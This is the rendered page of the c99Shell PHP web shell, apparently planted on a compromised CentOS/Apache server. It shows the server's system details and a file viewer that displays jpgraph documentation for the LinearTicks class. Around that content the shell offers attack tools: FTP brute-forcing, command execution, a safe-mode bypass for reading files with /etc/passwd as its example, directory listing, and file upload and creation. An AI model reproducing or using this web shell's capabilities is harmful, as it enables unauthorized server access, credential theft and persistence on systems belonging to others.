!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/manage/jpgraph/docs/ref/   drwxr-xr-x
Free 52.32 GB of 127.8 GB (40.94%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     LinearTicks.html (7.58 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |

CLASS LinearTicks EXTENDS Ticks
(Defined in: jpgraph.php : 4237)
 LinearTicks  Ticks 
 GetMajor() 
 GetMinor() 
 Set() 
 SetTextLabelStart() 
Set() 
 SetColor() 
 SetFormatCallback() 
 SetLabelFormat() 
 SetSide() 
 SetSize() 
 SetWeight() 
 SupressFirst() 
 SupressLast() 
 SupressMinorTickMarks() 
 SupressTickMarks() 
 SupressZeroLabel() 
 

Class usage and Overview
Internal class that handles the drawing and formatting of the tick marks on each axis. This class is accessed through it'sinstance variable in the scale, e.g.

$graph->xaxis->scale->ticks->Set(20,10);

Note: When you manually specify a scale you must also specify the major/minor tick intervall.

 

See also related classes:
LinearScale and LogScale

 


Class Methods

 

 

Return major step size in world coordinates


Description
Return major step size in world coordinates 

Example

$majintervall = $graph->xaxis->scale->ticks->Getmajor();

 

 

// Return minor step size in world coordinates


Description
Return minor step size in world coordinates. 

Example

$majintervall = $graph->xaxis->scale->ticks->Getmajor();

 

 

// Set Minor and Major ticks (in world coordinates)

ArgumentDefaultDescription
$aMajStep  Distance between major tick marks
$aMinStep false Distance between minor tick marks

Description
Set Minor and Major tick intervall (in world coordinates) 

Example

$graph->yaxis->scale->ticks->Set(40,20);

 

 

Which tick label should we start with?

ArgumentDefaultDescription
$aTextLabelOff  The number thaht the automatic textscale should start with.

Description
Normally text labels start at 0. However, automtic text labels can be started with an arbitrary number as specified with the argument to this method.  

Example

$graph->xaxis->scale->ticks->SetTextLabelStart(10);



:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0053 ]--